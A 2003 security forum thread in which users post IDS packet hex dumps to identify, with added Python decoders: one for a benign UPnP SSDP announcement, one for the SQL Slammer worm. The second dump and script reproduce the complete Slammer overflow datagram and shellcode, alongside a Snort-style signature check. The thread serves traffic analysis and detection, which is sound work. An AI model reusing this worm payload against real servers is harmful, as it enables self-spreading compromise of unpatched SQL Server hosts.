soup4you2
April 8th, 2003, 13:01
Here's one I had to go onsite once to figure out..

[code:1:127959ef89]
length = 313

000 : 4E 4F 54 49 46 59 20 2A 20 48 54 54 50 2F 31 2E NOTIFY * HTTP/1.
010 : 31 0D 0A 48 4F 53 54 3A 32 33 39 2E 32 35 35 2E 1..HOST:239.255.
020 : 32 35 35 2E 32 35 30 3A 31 39 30 30 0D 0A 43 61 255.250:1900..Ca
030 : 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 6D 61 78 2D che-Control:max-
040 : 61 67 65 3D 31 32 30 0D 0A 4C 6F 63 61 74 69 6F age=120..Locatio
050 : 6E 3A 68 74 74 70 3A 2F 2F 31 39 32 2E 31 36 38 n:http://192.168
060 : 2E 31 2E 31 3A 35 36 37 38 2F 72 6F 6F 74 44 65 .1.1:5678/rootDe
070 : 73 63 2E 78 6D 6C 0D 0A 4E 54 3A 75 72 6E 3A 73 sc.xml..NT:urn:s
080 : 63 68 65 6D 61 73 2D 75 70 6E 70 2D 6F 72 67 3A chemas-upnp-org:
090 : 73 65 72 76 69 63 65 3A 57 41 4E 49 50 43 6F 6E service:WANIPCon
0a0 : 6E 65 63 74 69 6F 6E 3A 31 0D 0A 55 53 4E 3A 75 nection:1..USN:u
0b0 : 75 69 64 3A 75 70 6E 70 2D 57 41 4E 43 6F 6E 6E uid:upnp-WANConn
0c0 : 65 63 74 69 6F 6E 44 65 76 69 63 65 2D 31 5F 30 ectionDevice-1_0
0d0 : 2D 30 30 39 30 61 32 37 37 37 37 37 37 3A 3A 75 -0090a2777777::u
0e0 : 72 6E 3A 73 63 68 65 6D 61 73 2D 75 70 6E 70 2D rn:schemas-upnp-
0f0 : 6F 72 67 3A 73 65 72 76 69 63 65 3A 57 41 4E 49 org:service:WANI
100 : 50 43 6F 6E 6E 65 63 74 69 6F 6E 3A 31 0D 0A 4E PConnection:1..N
110 : 54 53 3A 73 73 64 70 3A 61 6C 69 76 65 0D 0A 53 TS:ssdp:alive..S
120 : 65 72 76 65 72 3A 4E 54 2F 35 2E 30 20 55 50 6E erver:NT/5.0 UPn
130 : 50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
[/code:1:127959ef89]
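Reading a dump like this by hand is slow, so here is a worked decoder, added here and not part of the original post. It rebuilds the raw bytes from the offset / hex / ASCII rows (only the hex column is trusted; the ASCII column is a lossy rendering of the same bytes) and then parses the result. The bytes are an SSDP NOTIFY, the multicast "ssdp:alive" announcement a UPnP device sends to 239.255.255.250:1900, here advertising a WANIPConnection service (the UPnP Internet Gateway Device interface through which LAN hosts ask the router for port mappings) with its description document at http://192.168.1.1:5678/rootDesc.xml. The function names and the triage fields are my own choices; the dump is the one quoted above.

```python
from __future__ import annotations

import ipaddress
import re
from urllib.parse import urlsplit

# The capture from the post above, copied verbatim (offset : 16 hex bytes, ASCII).
SSDP_DUMP = """\
length = 313
000 : 4E 4F 54 49 46 59 20 2A 20 48 54 54 50 2F 31 2E NOTIFY * HTTP/1.
010 : 31 0D 0A 48 4F 53 54 3A 32 33 39 2E 32 35 35 2E 1..HOST:239.255.
020 : 32 35 35 2E 32 35 30 3A 31 39 30 30 0D 0A 43 61 255.250:1900..Ca
030 : 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 6D 61 78 2D che-Control:max-
040 : 61 67 65 3D 31 32 30 0D 0A 4C 6F 63 61 74 69 6F age=120..Locatio
050 : 6E 3A 68 74 74 70 3A 2F 2F 31 39 32 2E 31 36 38 n:http://192.168
060 : 2E 31 2E 31 3A 35 36 37 38 2F 72 6F 6F 74 44 65 .1.1:5678/rootDe
070 : 73 63 2E 78 6D 6C 0D 0A 4E 54 3A 75 72 6E 3A 73 sc.xml..NT:urn:s
080 : 63 68 65 6D 61 73 2D 75 70 6E 70 2D 6F 72 67 3A chemas-upnp-org:
090 : 73 65 72 76 69 63 65 3A 57 41 4E 49 50 43 6F 6E service:WANIPCon
0a0 : 6E 65 63 74 69 6F 6E 3A 31 0D 0A 55 53 4E 3A 75 nection:1..USN:u
0b0 : 75 69 64 3A 75 70 6E 70 2D 57 41 4E 43 6F 6E 6E uid:upnp-WANConn
0c0 : 65 63 74 69 6F 6E 44 65 76 69 63 65 2D 31 5F 30 ectionDevice-1_0
0d0 : 2D 30 30 39 30 61 32 37 37 37 37 37 37 3A 3A 75 -0090a2777777::u
0e0 : 72 6E 3A 73 63 68 65 6D 61 73 2D 75 70 6E 70 2D rn:schemas-upnp-
0f0 : 6F 72 67 3A 73 65 72 76 69 63 65 3A 57 41 4E 49 org:service:WANI
100 : 50 43 6F 6E 6E 65 63 74 69 6F 6E 3A 31 0D 0A 4E PConnection:1..N
110 : 54 53 3A 73 73 64 70 3A 61 6C 69 76 65 0D 0A 53 TS:ssdp:alive..S
120 : 65 72 76 65 72 3A 4E 54 2F 35 2E 30 20 55 50 6E erver:NT/5.0 UPn
130 : 50 2F 31 2E 30 0D 0A 0D 0A P/1.0....
"""

ROW_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*(.*)$")
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from 'offset : hex... ascii' rows.

    Each row must start where the previous one ended and holds at most 16
    bytes; the hex column ends at the first token that is not two hex digits.
    The total is checked against the 'length = N' header when present.
    """
    declared = None
    data = bytearray()
    for line in dump.splitlines():
        m = re.match(r"^\s*length\s*=\s*(\d+)", line)
        if m:
            declared = int(m.group(1))
            continue
        m = ROW_RE.match(line)
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(data):
            raise ValueError(f"row 0x{offset:x} does not follow 0x{len(data):x}")
        for tok in m.group(2).split()[:16]:
            if not HEX_BYTE.match(tok):
                break  # first ASCII-column token: the hex column is over
            data.append(int(tok, 16))
    if declared is not None and declared != len(data):
        raise ValueError(f"length = {declared} but {len(data)} bytes decoded")
    return bytes(data)


def parse_ssdp(payload: bytes) -> tuple[str, dict[str, str]]:
    """Split an SSDP message (HTTP-style, CRLF-delimited) into its start line
    and a header dict; names are lower-cased, as HTTP headers are
    case-insensitive."""
    head, sep, _ = payload.decode("ascii").partition("\r\n\r\n")
    if not sep:
        raise ValueError("SSDP message lacks the terminating empty line")
    start, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def triage_ssdp(payload: bytes) -> dict:
    """The fields an analyst wants at a glance: who is advertising what, where
    the device description lives, and whether that address is inside the LAN."""
    start, h = parse_ssdp(payload)
    loc = urlsplit(h.get("location", ""))
    return {
        "method": start.split()[0],
        "multicast_target": h.get("host"),
        "announce": h.get("nts"),  # ssdp:alive or ssdp:byebye
        "service": h.get("nt"),
        "device_id": h.get("usn", "").split("::")[0],
        "description_url": h.get("location"),
        "location_is_private": bool(loc.hostname) and ipaddress.ip_address(loc.hostname).is_private,
        "server": h.get("server"),
    }


if __name__ == "__main__":
    for key, value in triage_ssdp(parse_hexdump(SSDP_DUMP)).items():
        print(f"{key:>20}: {value}")
```

On this capture the Location host is an RFC 1918 address, so the announcement was seen on the LAN side of the router. What this packet alone cannot tell you is whether the same UPnP service also answers on the WAN interface; that is the check worth making on a router whose firmware has never been updated.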

bsdjunkie
April 8th, 2003, 14:11
Woot, someone h4x0r3d your linksys =)


http://www.dslreports.com/faq/5919

soup4you2
April 8th, 2003, 14:23
Yep, it was a Linksys that never had the firmware updated on it...

heh...

easily fixable

bsdjunkie
April 8th, 2003, 14:28
If you would like to post more like this, please do so... In the future I'll hold off answering to give others a chance as well. It's not fair since I do this for a living... :wink:

soup4you2
April 8th, 2003, 15:10
OK, here's another fun one... we all should be sick of seeing this


[code:1:94d5552d39]
length = 376

000 : 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
010 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
020 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
030 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
040 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
050 : 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
060 : 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
070 : 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
080 : B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
090 : 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
0a0 : 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
0b0 : 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
0c0 : 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
0d0 : B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
0e0 : D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
0f0 : BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
100 : BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
110 : 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
120 : 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
130 : C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
140 : D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
150 : C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
160 : 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
170 : 8B 45 AC 50 FF D6 EB CA .E.P....

[/code:1:94d5552d39]
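This dump is a single UDP datagram to port 1434: a 0x04 (instance-lookup) request to the SQL Server Resolution Service whose instance-name field is filled with 0x01 bytes until it overruns the stack buffer (CVE-2002-0649), followed by the shellcode. That is the SQL Slammer / W32.SQLExp worm of January 2003. The example below is added here and is not part of the original posts: it checks a payload against the content match the classic Snort rule for this worm uses, measures the overflow (filler length and the value that lands on the saved return address, 0x42B0C9DC, the well-documented jmp esp address the worm uses), and replays the shellcode's stack-string construction to recover the API names it resolves. The payload is transcribed row by row from the dump above; the function names are mine.

```python
from __future__ import annotations

import re

# The capture from the post above, transcribed row by row: the 0x04 request
# byte, 96 bytes of 0x01 filler, then everything from offset 0x61 onwards.
SLAMMER_PAYLOAD = b"\x04" + b"\x01" * 96 + bytes.fromhex("""
    DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE
    42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9
    B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01
    01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33
    32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B
    43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64
    68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66
    B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45
    D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50
    BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05
    BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1
    03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B
    45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45
    C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61
    D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2
    C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D
    45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50
    8B 45 AC 50 FF D6 EB CA
""")

# The content match the classic Snort rule for this worm uses, together with a
# 0x04 first byte and the strings "sock" and "send".  The bytes are two
# "xor ecx, imm32" instructions that build the sockaddr (AF_INET, port 1434)
# without any NUL bytes.
SNORT_CONTENT = bytes.fromhex("81 F1 03 01 04 9B 81 F1 01")
PRINTABLE4 = re.compile(rb"[ -~]{4}")


def matches_slammer(payload: bytes) -> bool:
    """Signature check for a UDP/1434 payload."""
    return (payload[:1] == b"\x04"
            and SNORT_CONTENT in payload
            and b"sock" in payload
            and b"send" in payload)


def decode_stack_strings(code: bytes, start: int) -> list[str]:
    """Replay the push imm32 / mov cx,imm16 / push ecx run that the shellcode
    uses to build NUL-terminated strings on the stack, then read the stack
    back in memory order.  ecx is zero when the run begins (the code has just
    done xor ecx,ecx and a loop that counted it back down)."""
    ecx, pushes, i = 0, [], start
    while i < len(code):
        op = code[i]
        if op == 0x68 and PRINTABLE4.fullmatch(code[i + 1:i + 5]):  # push imm32
            pushes.append(code[i + 1:i + 5])
            i += 5
        elif op == 0x66 and code[i + 1:i + 2] == b"\xb9":            # mov cx, imm16
            ecx = (ecx & 0xFFFF0000) | int.from_bytes(code[i + 2:i + 4], "little")
            i += 4
        elif op == 0x51:                                               # push ecx
            pushes.append(ecx.to_bytes(4, "little"))
            i += 1
        else:
            break  # first instruction outside the string-building run
    memory = b"".join(reversed(pushes))  # the last push sits at the lowest address
    return [s.decode("ascii") for s in memory.split(b"\x00") if s]


def summarize(payload: bytes) -> dict:
    """Shape of the overflow: SSRP request type, how many filler bytes follow
    it, the 32-bit value that lands on the saved return address, and the API
    names the shellcode resolves (empty unless the signature matches)."""
    rest = payload[1:]
    body = rest.lstrip(b"\x01")
    run = payload.find(b"\x51\x68")  # push ecx; push imm32: start of the string run
    return {
        "request_type": payload[0],
        "pad_len": len(rest) - len(body),
        "ret_addr": int.from_bytes(body[:4], "little") if len(body) >= 4 else None,
        "api_names": (decode_stack_strings(payload, run)
                      if matches_slammer(payload) and run >= 0 else []),
    }


if __name__ == "__main__":
    print("slammer:", matches_slammer(SLAMMER_PAYLOAD))
    for key, value in summarize(SLAMMER_PAYLOAD).items():
        print(f"{key:>13}: {value}")
```

The recovered names (sendto, socket, ws2_32.dll, GetTickCount, kernel32.dll) are the whole of the worm's import table: it seeds a pseudo-random generator from the tick count and sends copies of itself to random addresses on UDP/1434 from a single socket, which is why a host that matches this signature once will be seen again within seconds.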

bsdjunkie
April 8th, 2003, 15:19
Another good one =) I get these hits on my IDS more than anything else recently...


10,059 hits since 03/30/03 till today. :roll:

soup4you2
April 8th, 2003, 15:33
I've gotten 11 since the 4th. Now I've gotten lazy and set portsentry to listen on that port.. 1 packet and *poof* ipfw takes over

tarballed
April 8th, 2003, 16:08
Boy, do I have some major questions. :P

First, let's start with the actual data. I'm guessing that the data you posted in this thread is from a Snort file of some sort? If not, what?

Secondly, what is the best way to read a log file like that? I see all the hex on the left, and information on the right.
What is the best way to break this down and read it so you can determine what is going on?

Thirdly, post some more! This is great for learning!

Tarballed